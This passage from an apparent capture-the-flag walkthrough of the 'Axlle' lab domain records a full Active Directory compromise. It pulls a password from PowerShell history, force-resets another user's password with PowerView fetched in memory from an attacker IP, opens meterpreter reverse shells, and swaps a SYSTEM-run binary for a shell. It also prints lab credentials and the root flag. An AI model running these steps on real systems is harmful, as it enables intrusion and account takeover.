MemberOf : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
Modified : 1/2/2024 6:33:15 AM
modifyTimeStamp : 1/2/2024 6:33:15 AM
Name : Web Devs
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass : group
ObjectGUID : 30b2b798-6b14-4019-9d49-63d72056520e
objectSid : S-1-5-21-1005535646-190407494-3473065389-1127
ProtectedFromAccidentalDeletion : False
SamAccountName : Web Devs
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-1005535646-190407494-3473065389-1127
SIDHistory : {}
uSNChanged : 41228
uSNCreated : 41081
whenChanged : 1/2/2024 6:33:15 AM
whenCreated : 1/2/2024 5:42:37 AMAccess to C:\App Development is still denied to us.
Checking the powershell history reveals the password of user:
PS C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);Creds:
dallon.matrix:PJsO1du$CVJ#D
Since we got credentials we can harvest information about DC with bloodhound
Refer to: [[Bloodhound]]
Show all groups permissions: Select Group -> First Degree Object Control
Looks like we can reset password of 2 users. jacob.greeny and baz.humphries
TheHackerRecipies: ForceChangePassword Docs: https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainUserPassword/ Scripts https://github.com/PowerShellMafia/PowerSploit
└─$ cp /opt/PowerSploit/Recon/PowerView.ps1 .
---
PS C:\users\public> IEX (IWR 10.10.16.75/PowerView.ps1 -UseBasicParsing)
PS C:\users\public> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force
PS C:\users\public> Set-DomainUserPassword -Identity 'jacob.greeny' -AccountPassword $NewPassword
PS C:\> iwr 10.10.16.75/RunasCs.exe -o \users\public\rc.exe
meterpreter > bg
msf6 exploit(multi/handler) > run -j
msf6 exploit(multi/handler) > sessions 40
meterpreter > shell
C:\>powershell
PS C:\> \users\public\rc.exe 'jacob.greeny' 'Password123$' \users\public\rev.exe
^C
meterpreter > bg
msf6 exploit(multi/handler) > sessions 41
meterpreter > getuid
Server username: AXLLE\jacob.greeny
PS C:\Windows\system32> whoami /all
User Name SID
================== =============================================
axlle\jacob.greeny S-1-5-21-1005535646-190407494-3473065389-1120
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
AXLLE\App Devs Group S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledWe are part of App Devs and finally have access to C:\App Development:
PS C:\App Development> tree /f
C:.
+---kbfiltr
kbfiltr.sln
README.md
+---exe
kbftest.c
kbftest.vcxproj
kbftest.vcxproj.Filters
+---sys
kbfiltr.c
kbfiltr.h
kbfiltr.inx
kbfiltr.rc
kbfiltr.vcxproj
kbfiltr.vcxproj.Filters
public.h
rawpdo.cWe have a README.md so let's check what project does:
PS C:\App Development\kbfiltr> cat readme.md
## Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.
### Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.
### Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
### Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10
### Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.
### Usage
#### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.
#### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.
#### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.
### Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE
### Bugs
There are probably several.Zip the directory and download:
PS C:\App Development> & "C:\Program Files (x86)\hMailServer\Bin\7za.exe" a -tzip C:\Users\Public\app.zip .\kbfiltr
meterpreter > download C:\\Users\\Public\\app.zipThe source has nothing interesting, but the comment which developer left is. automated task = cronjob!
meterpreter > cd "C:\\Program Files (x86)\\Windows Kits\\10\\Testing\\StandaloneTesting\\Internal"
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal
==================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2024-01-01 00:57:22 -0500 arm
040777/rwxrwxrwx 0 dir 2024-01-01 00:57:11 -0500 arm64
100777/rwxrwxrwx 71 fil 2023-09-13 21:28:22 -0400 run.bat
100666/rw-rw-rw- 15665 fil 2023-09-30 10:40:52 -0400 run.ps1
100777/rwxrwxrwx 73 fil 2023-09-13 21:28:22 -0400 setup.bat
100666/rw-rw-rw- 14762 fil 2023-09-30 10:41:00 -0400 setup.ps1
100666/rw-rw-rw- 21504 fil 2023-09-30 10:38:44 -0400 standaloneexport.dll
040777/rwxrwxrwx 4096 dir 2024-06-25 09:59:28 -0400 x64
040777/rwxrwxrwx 0 dir 2024-01-01 00:57:23 -0500 x86It looks like we have 777 permission on the directory where binary lives, so since its a cronjob we can replace it with reverse shell and get system.
meterpreter > cd x64
meterpreter > cp standalonerunner.exe standalonerunner.exe.bak
meterpreter > cp C:\\Users\\Public\\rev.exe standalonerunner.exe
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64
======================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 7168 fil 2024-06-25 06:50:27 -0400 standalonerunner.exe
100666/rw-rw-rw- 33392 fil 2023-09-30 06:08:18 -0400 standalonerunner.exe.bak
100666/rw-rw-rw- 43632 fil 2023-09-30 06:08:26 -0400 standalonexml.dllPrivilege Escalation (Administrator)
So for whatever reason the msfvenom payload was not triggering, so I just decided to use Golang reverse shell.
Refer to [[Golang Reverse Shell]]
Root.txt
PS C:\users\Administrator> cat Desktop/root.txt
1909061be135bf5f98a16c62b9950436Last updated